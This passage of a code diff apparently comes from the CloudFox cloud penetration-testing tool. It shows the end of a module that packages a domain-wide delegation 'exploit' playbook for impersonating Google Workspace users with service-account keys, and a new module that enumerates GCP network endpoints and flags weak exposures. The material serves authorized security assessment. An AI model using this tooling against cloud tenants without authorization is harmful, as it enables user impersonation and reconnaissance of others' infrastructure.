dwd_exploit.py --key-file sa-key.json --subject admin@domain.com --action list-users + +# ============================================================================= +# NOTES +# ============================================================================= +# - Scopes must be pre-authorized in Google Admin Console: +# Admin Console > Security > API Controls > Domain-wide Delegation +# - The service account's OAuth2 Client ID must be listed there +# - Not all scopes may be authorized - run 'test' to check +# - admin_directory scopes require impersonating a Workspace admin user +# - In interactive mode, use 'subject' command to switch users without restarting +`) + + return internal.LootFile{ + Name: "dwd-playbook", + Contents: commands.String(), + } +} + +// 
------------------------------ +// Output Generation +// ------------------------------ +func (m *DomainWideDelegationModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *DomainWideDelegationModule) getHeader() []string { + return []string{ + "Project", + "Email", + "DWD Enabled", + "OAuth2 Client ID", + "Key ID", + "Key Created", + "Key Expires", + "Key Algorithm", + } +} + +func (m *DomainWideDelegationModule) accountsToTableBody(accounts []domainwidedelegationservice.DWDServiceAccount) [][]string { + var body [][]string + for _, account := range accounts { + dwdStatus := "No" + if account.DWDEnabled { + dwdStatus = "Yes" + } + + clientID := account.OAuth2ClientID + if clientID == "" { + clientID = "-" + } + + if len(account.Keys) > 0 { + // One row per key + for _, key := range account.Keys { + body = append(body, []string{ + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + key.KeyID, + key.CreatedAt, + key.ExpiresAt, + key.KeyAlgorithm, + }) + } + } else { + // Account with no keys - still show it + body = append(body, []string{ + m.GetProjectName(account.ProjectID), + account.Email, + dwdStatus, + clientID, + "-", + "-", + "-", + "-", + }) + } + } + return body +} + +func (m *DomainWideDelegationModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if accounts, ok := m.ProjectDWDAccounts[projectID]; ok && len(accounts) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "domain-wide-delegation", + Header: m.getHeader(), + Body: m.accountsToTableBody(accounts), + }) + } + + return tableFiles +} + +func (m *DomainWideDelegationModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: 
make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Generate Python script once (same for all projects) + pythonScript := m.generateDWDPythonScript() + + for projectID, accounts := range m.ProjectDWDAccounts { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if len(accounts) > 0 { + // Add Python script to each project + lootFiles = append(lootFiles, pythonScript) + // Add project-specific commands + lootFiles = append(lootFiles, m.generateDWDCommands(accounts)) + } + + outputData.ProjectLevelData[projectID] = DomainWideDelegationOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + } +} + +func (m *DomainWideDelegationModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allAccounts := m.getAllDWDAccounts() + + var tables []internal.TableFile + + if len(allAccounts) > 0 { + tables = append(tables, internal.TableFile{ + Name: "domain-wide-delegation", + Header: m.getHeader(), + Body: m.accountsToTableBody(allAccounts), + }) + } + + var lootFiles []internal.LootFile + if len(allAccounts) > 0 { + lootFiles = append(lootFiles, m.generateDWDPythonScript()) + lootFiles = append(lootFiles, m.generateDWDCommands(allAccounts)) + } + + output := DomainWideDelegationOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + 
logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_DOMAINWIDEDELEGATION_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/endpoints.go b/gcp/commands/endpoints.go new file mode 100755 index 00000000..9ae3a094 --- /dev/null +++ b/gcp/commands/endpoints.go @@ -0,0 +1,1537 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + appengine "google.golang.org/api/appengine/v1" + compute "google.golang.org/api/compute/v1" + run "google.golang.org/api/run/v1" +) + +var GCPEndpointsCommand = &cobra.Command{ + Use: "endpoints", + Aliases: []string{"exposure", "external", "public-ips", "internet-facing"}, + Short: "Enumerate all network endpoints (external and internal) with IPs, URLs, and hostnames", + Long: `Enumerate all network endpoints in GCP with comprehensive analysis. 
+ +Features: +- Static external IP addresses +- Compute Engine instances (external and internal IPs) +- Load balancers (HTTP(S), TCP, UDP) - external and internal +- Cloud Run services and jobs +- Cloud Functions HTTP triggers +- GKE cluster API endpoints +- Cloud SQL instances (MySQL, PostgreSQL, SQL Server) +- Memorystore Redis instances +- Filestore NFS instances +- Cloud Composer/Airflow web UI URLs +- Pub/Sub push subscription endpoints +- App Engine services +- Vertex AI Notebooks +- Dataproc clusters (master/worker nodes) +- VPN Gateways +- Cloud NAT gateways +- Private Service Connect endpoints + +Output includes a unified table with Exposure (External/Internal) column.`, + Run: runGCPEndpointsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type Endpoint struct { + ProjectID string + Name string + Type string // Static IP, Instance, LoadBalancer, Cloud Run, GKE, Cloud SQL, etc. + ExternalIP string + InternalIP string + Hostname string + Protocol string + Port string + Resource string + ResourceType string + Region string + Status string + ServiceAccount string + TLSEnabled bool + IsExternal bool // true for external, false for internal + Network string // VPC network name + Security string // Security notes (e.g., "No Auth", "Public", "SSL Required") +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type EndpointsModule struct { + gcpinternal.BaseGCPModule + + ProjectEndpoints map[string][]Endpoint // projectID -> endpoints + mu sync.Mutex + + // Firewall rule mapping: "network:tag1,tag2" -> allowed ports + firewallPortMap map[string][]string +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type EndpointsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o EndpointsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o EndpointsOutput) LootFiles() 
[]internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPEndpointsCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, "endpoints") + if err != nil { + return + } + + module := &EndpointsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEndpoints: make(map[string][]Endpoint), + firewallPortMap: make(map[string][]string), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *EndpointsModule) getAllEndpoints() []Endpoint { + var all []Endpoint + for _, endpoints := range m.ProjectEndpoints { + all = append(all, endpoints...) + } + return all +} + +func (m *EndpointsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, "endpoints", m.processProject) + + allEndpoints := m.getAllEndpoints() + if len(allEndpoints) == 0 { + logger.InfoM("No endpoints found", "endpoints") + return + } + + // Count external vs internal + externalCount := 0 + internalCount := 0 + for _, ep := range allEndpoints { + if ep.IsExternal { + externalCount++ + } else { + internalCount++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d endpoint(s) [%d external, %d internal]", + len(allEndpoints), externalCount, internalCount), "endpoints") + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *EndpointsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Analyzing endpoints in project: %s", projectID), "endpoints") + } + + computeService, err := compute.NewService(ctx) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, "endpoints", + 
fmt.Sprintf("Could not create Compute service in project %s", projectID)) + } else { + // Compute-based endpoints + m.analyzeFirewallRules(ctx, computeService, projectID, logger) + m.getStaticExternalIPs(ctx, computeService, projectID, logger) + m.getInstanceIPs(ctx, computeService, projectID, logger) + m.getLoadBalancers(ctx, computeService, projectID, logger) + m.getVPNGateways(ctx, computeService, projectID, logger) + m.getCloudNAT(ctx, computeService, projectID, logger) + m.getPrivateServiceConnect(ctx, computeService, projectID, logger) + } + + // Serverless endpoints + m.getCloudRunServices(ctx, projectID, logger) + m.getCloudFunctions(ctx, projectID, logger) + m.getAppEngineServices(ctx, projectID, logger) + + // Container/Kubernetes endpoints + m.getGKEClusters(ctx, projectID, logger) + + // Database endpoints + m.getCloudSQLInstances(ctx, projectID, logger) + m.getMemorystoreRedis(ctx, projectID, logger) + + // Storage endpoints + m.getFilestoreInstances(ctx, projectID, logger) + + // Data/ML endpoints + m.getComposerEnvironments(ctx, projectID, logger) + m.getDataprocClusters(ctx, projectID, logger) + m.getNotebookInstances(ctx, projectID, logger) + + // Messaging endpoints + m.getPubSubPushEndpoints(ctx, projectID, logger) +} + +// getStaticExternalIPs retrieves static external IP addresses +func (m *EndpointsModule) getStaticExternalIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Global addresses + req := svc.GlobalAddresses.List(projectID) + if err := req.Pages(ctx, func(page *compute.AddressList) error { + for _, addr := range page.Items { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + security := "" + if user == "" { + security = "Unused" + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + ExternalIP: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: 
"Address", + Region: "global", + Status: addr.Status, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global addresses in project %s", projectID)) + } + + // Regional addresses - use AggregatedList to avoid needing compute.regions.list permission + addrReq := svc.Addresses.AggregatedList(projectID) + if err := addrReq.Pages(ctx, func(page *compute.AddressAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Addresses == nil { + continue + } + // Extract region from scope name (format: "regions/us-central1") + regionName := "unknown" + if strings.HasPrefix(scopeName, "regions/") { + regionName = strings.TrimPrefix(scopeName, "regions/") + } + for _, addr := range scopedList.Addresses { + if addr.AddressType == "EXTERNAL" { + user := "" + if len(addr.Users) > 0 { + user = extractResourceName(addr.Users[0]) + } + security := "" + if user == "" { + security = "Unused" + } + ep := Endpoint{ + ProjectID: projectID, + Name: addr.Name, + Type: "Static IP", + ExternalIP: addr.Address, + Protocol: "TCP/UDP", + Port: "ALL", + Resource: user, + ResourceType: "Address", + Region: regionName, + Status: addr.Status, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional addresses in project %s", projectID)) + } +} + +// getInstanceIPs retrieves instances with both external and internal IPs +func (m *EndpointsModule) getInstanceIPs(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Instances.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for zone, scopedList := range page.Items { + if scopedList.Instances == nil { + continue + } + 
for _, instance := range scopedList.Instances { + zoneName := extractZoneFromScope(zone) + + var serviceAccount string + if len(instance.ServiceAccounts) > 0 { + serviceAccount = instance.ServiceAccounts[0].Email + } + + for _, iface := range instance.NetworkInterfaces { + networkName := extractResourceName(iface.Network) + internalIP := iface.NetworkIP + + // External IP + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Compute Engine", + ExternalIP: accessConfig.NatIP, + InternalIP: internalIP, + Protocol: "TCP/UDP", + Port: "ALL", + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: true, + Network: networkName, + } + m.addEndpoint(projectID, ep) + } + } + + // Internal only (no external IP) + hasExternalIP := false + for _, accessConfig := range iface.AccessConfigs { + if accessConfig.NatIP != "" { + hasExternalIP = true + break + } + } + if !hasExternalIP && internalIP != "" { + ports := m.getPortsForInstance(networkName, instance.Tags) + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Compute Engine", + InternalIP: internalIP, + Protocol: "TCP/UDP", + Port: ports, + ResourceType: "Instance", + Region: zoneName, + Status: instance.Status, + ServiceAccount: serviceAccount, + IsExternal: false, + Network: networkName, + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list instances in project %s", projectID)) + } +} + +// getPortsForInstance determines open ports for an instance based on firewall rules +func (m *EndpointsModule) getPortsForInstance(network string, tags *compute.Tags) string { + var allPorts []string + + if ports, ok := m.firewallPortMap[network]; ok { + allPorts = append(allPorts, ports...) 
+ } + + if tags != nil { + for _, tag := range tags.Items { + key := fmt.Sprintf("%s:%s", network, tag) + if ports, ok := m.firewallPortMap[key]; ok { + allPorts = append(allPorts, ports...) + } + } + } + + if len(allPorts) == 0 { + return "ALL" + } + + portSet := make(map[string]bool) + for _, p := range allPorts { + portSet[p] = true + } + var uniquePorts []string + for p := range portSet { + uniquePorts = append(uniquePorts, p) + } + + return strings.Join(uniquePorts, ",") +} + +// getLoadBalancers retrieves both external and internal load balancers +func (m *EndpointsModule) getLoadBalancers(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Regional forwarding rules + req := svc.ForwardingRules.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.ForwardingRuleAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ForwardingRules == nil { + continue + } + for _, rule := range scopedList.ForwardingRules { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } else if len(rule.Ports) > 0 { + ports = strings.Join(rule.Ports, ",") + } + + target := extractResourceName(rule.Target) + if target == "" && rule.BackendService != "" { + target = extractResourceName(rule.BackendService) + } + + isExternal := rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" + isInternal := rule.LoadBalancingScheme == "INTERNAL" || rule.LoadBalancingScheme == "INTERNAL_MANAGED" || rule.LoadBalancingScheme == "INTERNAL_SELF_MANAGED" + + lbType := "LoadBalancer" + if isInternal { + lbType = "Internal LB" + } + + if isExternal || isInternal { + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if isExternal && !tlsEnabled && ports != "443" { + security = "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: lbType, + Protocol: rule.IPProtocol, + Port: 
ports, + Resource: target, + ResourceType: "ForwardingRule", + Region: extractRegionFromScope(region), + TLSEnabled: tlsEnabled, + IsExternal: isExternal, + Network: extractResourceName(rule.Network), + Security: security, + } + if isExternal { + ep.ExternalIP = rule.IPAddress + } else { + ep.InternalIP = rule.IPAddress + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list regional forwarding rules in project %s", projectID)) + } + + // Global forwarding rules + globalReq := svc.GlobalForwardingRules.List(projectID) + if err := globalReq.Pages(ctx, func(page *compute.ForwardingRuleList) error { + for _, rule := range page.Items { + if rule.LoadBalancingScheme == "EXTERNAL" || rule.LoadBalancingScheme == "EXTERNAL_MANAGED" { + ports := "ALL" + if rule.PortRange != "" { + ports = rule.PortRange + } + + tlsEnabled := rule.PortRange == "443" || strings.Contains(strings.ToLower(rule.Name), "https") + security := "" + if !tlsEnabled && ports != "443" { + security = "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: rule.Name, + Type: "Global LB", + ExternalIP: rule.IPAddress, + Protocol: rule.IPProtocol, + Port: ports, + Resource: extractResourceName(rule.Target), + ResourceType: "GlobalForwardingRule", + Region: "global", + TLSEnabled: tlsEnabled, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list global forwarding rules in project %s", projectID)) + } +} + +// getVPNGateways retrieves VPN gateway external IPs +func (m *EndpointsModule) getVPNGateways(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Classic VPN Gateways + req := svc.TargetVpnGateways.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.TargetVpnGatewayAggregatedList) error 
{ + for region, scopedList := range page.Items { + if scopedList.TargetVpnGateways == nil { + continue + } + for _, gw := range scopedList.TargetVpnGateways { + for i, ip := range gw.ForwardingRules { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-ip%d", gw.Name, i), + Type: "VPN Gateway", + ExternalIP: extractResourceName(ip), + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "VPNGateway", + Region: extractRegionFromScope(region), + Status: gw.Status, + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list classic VPN gateways in project %s", projectID)) + } + + // HA VPN Gateways + haReq := svc.VpnGateways.AggregatedList(projectID) + if err := haReq.Pages(ctx, func(page *compute.VpnGatewayAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.VpnGateways == nil { + continue + } + for _, gw := range scopedList.VpnGateways { + for _, iface := range gw.VpnInterfaces { + if iface.IpAddress != "" { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s-if%d", gw.Name, iface.Id), + Type: "HA VPN Gateway", + ExternalIP: iface.IpAddress, + Protocol: "ESP/UDP", + Port: "500,4500", + ResourceType: "HAVPNGateway", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(gw.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list HA VPN gateways in project %s", projectID)) + } +} + +// getCloudNAT retrieves Cloud NAT external IPs +func (m *EndpointsModule) getCloudNAT(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + req := svc.Routers.AggregatedList(projectID) + if err := req.Pages(ctx, func(page *compute.RouterAggregatedList) error { + for 
region, scopedList := range page.Items { + if scopedList.Routers == nil { + continue + } + for _, router := range scopedList.Routers { + for _, nat := range router.Nats { + for _, ip := range nat.NatIps { + ep := Endpoint{ + ProjectID: projectID, + Name: fmt.Sprintf("%s/%s", router.Name, nat.Name), + Type: "Cloud NAT", + ExternalIP: extractResourceName(ip), + Protocol: "TCP/UDP", + Port: "ALL", + ResourceType: "CloudNAT", + Region: extractRegionFromScope(region), + IsExternal: true, + Network: extractResourceName(router.Network), + } + m.addEndpoint(projectID, ep) + } + } + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud NAT routers in project %s", projectID)) + } +} + +// getPrivateServiceConnect retrieves Private Service Connect endpoints +func (m *EndpointsModule) getPrivateServiceConnect(ctx context.Context, svc *compute.Service, projectID string, logger internal.Logger) { + // Service Attachments (producer side) + saReq := svc.ServiceAttachments.AggregatedList(projectID) + if err := saReq.Pages(ctx, func(page *compute.ServiceAttachmentAggregatedList) error { + for region, scopedList := range page.Items { + if scopedList.ServiceAttachments == nil { + continue + } + for _, sa := range scopedList.ServiceAttachments { + ep := Endpoint{ + ProjectID: projectID, + Name: sa.Name, + Type: "PSC Service", + Hostname: sa.SelfLink, + Protocol: "TCP", + Port: "ALL", + ResourceType: "ServiceAttachment", + Region: extractRegionFromScope(region), + IsExternal: false, + } + m.addEndpoint(projectID, ep) + } + } + return nil + }); err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list service attachments in project %s", projectID)) + } +} + +// getCloudRunServices retrieves Cloud Run services +func (m *EndpointsModule) getCloudRunServices(ctx context.Context, projectID string, logger internal.Logger) { + runService, err := run.NewService(ctx) + if err != nil 
{ + return + } + + parent := fmt.Sprintf("projects/%s/locations/-", projectID) + resp, err := runService.Projects.Locations.Services.List(parent).Do() + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Run services in project %s", projectID)) + return + } + + for _, service := range resp.Items { + if service.Status != nil && service.Status.Url != "" { + hostname := strings.TrimPrefix(service.Status.Url, "https://") + + ep := Endpoint{ + ProjectID: projectID, + Name: service.Metadata.Name, + Type: "Cloud Run", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudRun", + TLSEnabled: true, + IsExternal: true, + } + + if service.Metadata != nil && service.Metadata.Labels != nil { + if region, ok := service.Metadata.Labels["cloud.googleapis.com/location"]; ok { + ep.Region = region + } + } + + if service.Spec != nil && service.Spec.Template != nil && service.Spec.Template.Spec != nil { + ep.ServiceAccount = service.Spec.Template.Spec.ServiceAccountName + } + + m.addEndpoint(projectID, ep) + } + } +} + +// getCloudFunctions retrieves Cloud Functions with HTTP triggers +func (m *EndpointsModule) getCloudFunctions(ctx context.Context, projectID string, logger internal.Logger) { + fs := functionsservice.New() + functions, err := fs.Functions(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud Functions in project %s", projectID)) + return + } + + for _, fn := range functions { + if fn.TriggerURL != "" { + hostname := strings.TrimPrefix(fn.TriggerURL, "https://") + security := "" + if fn.IsPublic { + security = "Public (No Auth)" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: fn.Name, + Type: "Cloud Function", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "CloudFunction", + Region: fn.Region, + Status: fn.State, + ServiceAccount: fn.ServiceAccount, + TLSEnabled: true, + IsExternal: true, 
+ Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getAppEngineServices retrieves App Engine services +func (m *EndpointsModule) getAppEngineServices(ctx context.Context, projectID string, logger internal.Logger) { + aeService, err := appengine.NewService(ctx) + if err != nil { + return + } + + // Get app info + app, err := aeService.Apps.Get(projectID).Do() + if err != nil { + // App Engine not enabled or no app + return + } + + // List services + servicesResp, err := aeService.Apps.Services.List(projectID).Do() + if err != nil { + return + } + + for _, svc := range servicesResp.Services { + // Default service hostname + hostname := fmt.Sprintf("%s.appspot.com", projectID) + if svc.Id != "default" { + hostname = fmt.Sprintf("%s-dot-%s.appspot.com", svc.Id, projectID) + } + + ep := Endpoint{ + ProjectID: projectID, + Name: svc.Id, + Type: "App Engine", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "AppEngine", + Region: app.LocationId, + TLSEnabled: true, + IsExternal: true, + } + m.addEndpoint(projectID, ep) + } +} + +// getGKEClusters retrieves GKE cluster API endpoints +func (m *EndpointsModule) getGKEClusters(ctx context.Context, projectID string, logger internal.Logger) { + gs := gkeservice.New() + clusters, _, err := gs.Clusters(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list GKE clusters in project %s", projectID)) + return + } + + for _, cluster := range clusters { + if cluster.Endpoint != "" { + isExternal := !cluster.PrivateCluster + security := "" + if !cluster.PrivateCluster && !cluster.MasterAuthorizedOnly { + security = "Public API (No Restrictions)" + } else if cluster.MasterAuthorizedOnly { + security = "Authorized Networks Only" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: cluster.Name, + Type: "GKE API", + Protocol: "HTTPS", + Port: "443", + ResourceType: "GKECluster", + Region: cluster.Location, + Status: cluster.Status, 
+ TLSEnabled: true, + IsExternal: isExternal, + Network: cluster.Network, + Security: security, + } + if isExternal { + ep.ExternalIP = cluster.Endpoint + } else { + ep.InternalIP = cluster.Endpoint + } + m.addEndpoint(projectID, ep) + } + } +} + +// getCloudSQLInstances retrieves Cloud SQL instances +func (m *EndpointsModule) getCloudSQLInstances(ctx context.Context, projectID string, logger internal.Logger) { + cs := cloudsqlservice.New() + instances, err := cs.Instances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Cloud SQL instances in project %s", projectID)) + return + } + + for _, instance := range instances { + port := "3306" // MySQL default + if strings.Contains(instance.DatabaseVersion, "POSTGRES") { + port = "5432" + } else if strings.Contains(instance.DatabaseVersion, "SQLSERVER") { + port = "1433" + } + + // Public IP + if instance.PublicIP != "" { + security := "" + if !instance.RequireSSL { + security = "SSL Not Required" + } + for _, an := range instance.AuthorizedNetworks { + if an.IsPublic { + security = "Open to 0.0.0.0/0" + break + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + ExternalIP: instance.PublicIP, + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: true, + Security: security, + } + m.addEndpoint(projectID, ep) + } else if instance.PrivateIP != "" { + // Private IP only + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Cloud SQL", + InternalIP: instance.PrivateIP, + Protocol: "TCP", + Port: port, + ResourceType: "CloudSQL", + Region: instance.Region, + Status: instance.State, + TLSEnabled: instance.RequireSSL, + IsExternal: false, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getMemorystoreRedis retrieves Memorystore Redis instances +func (m 
*EndpointsModule) getMemorystoreRedis(ctx context.Context, projectID string, logger internal.Logger) { + ms := memorystoreservice.New() + instances, err := ms.ListRedisInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Memorystore Redis instances in project %s", projectID)) + return + } + + for _, instance := range instances { + if instance.Host != "" { + security := "" + if !instance.AuthEnabled { + security = "No Auth" + } + if instance.TransitEncryption == "DISABLED" { + if security != "" { + security += ", " + } + security += "No TLS" + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Redis", + InternalIP: instance.Host, + Protocol: "TCP", + Port: fmt.Sprintf("%d", instance.Port), + ResourceType: "Memorystore", + Region: instance.Location, + Status: instance.State, + TLSEnabled: instance.TransitEncryption != "DISABLED", + IsExternal: false, + Network: extractResourceName(instance.AuthorizedNetwork), + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getFilestoreInstances retrieves Filestore NFS instances +func (m *EndpointsModule) getFilestoreInstances(ctx context.Context, projectID string, logger internal.Logger) { + fs := filestoreservice.New() + instances, err := fs.ListInstances(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Filestore instances in project %s", projectID)) + return + } + + for _, instance := range instances { + for _, ip := range instance.IPAddresses { + security := "" + for _, share := range instance.Shares { + for _, opt := range share.NfsExportOptions { + if opt.SquashMode == "NO_ROOT_SQUASH" { + security = "NO_ROOT_SQUASH" + break + } + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: instance.Name, + Type: "Filestore NFS", + InternalIP: ip, + Protocol: "NFS", + Port: "2049", + ResourceType: "Filestore", + Region: instance.Location, + 
Status: instance.State, + IsExternal: false, + Network: instance.Network, + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getComposerEnvironments retrieves Cloud Composer Airflow web UI URLs +func (m *EndpointsModule) getComposerEnvironments(ctx context.Context, projectID string, logger internal.Logger) { + cs := composerservice.New() + environments, err := cs.ListEnvironments(projectID) + if err != nil { + gcpinternal.HandleGCPError(err, logger, "endpoints", + fmt.Sprintf("Could not list Composer environments in project %s", projectID)) + return + } + + for _, env := range environments { + if env.AirflowURI != "" { + hostname := strings.TrimPrefix(env.AirflowURI, "https://") + security := "" + if !env.PrivateEnvironment { + security = "Public Web UI" + } + for _, ip := range env.WebServerAllowedIPs { + if ip == "0.0.0.0/0" { + security = "Open to 0.0.0.0/0" + break + } + } + + ep := Endpoint{ + ProjectID: projectID, + Name: env.Name, + Type: "Composer Airflow", + Hostname: hostname, + Protocol: "HTTPS", + Port: "443", + ResourceType: "Composer", + Region: env.Location, + Status: env.State, + ServiceAccount: env.ServiceAccount, + TLSEnabled: true, + IsExternal: !env.PrivateEnvironment, + Network: extractResourceName(env.Network), + Security: security, + } + m.addEndpoint(projectID, ep) + } + } +} + +// getDataprocClusters retrieves Dataproc cluster master/worker IPs +func (m *EndpointsModule) getDataprocClusters(ctx context.Context, projectID string, logger internal.Logger) { + ds := 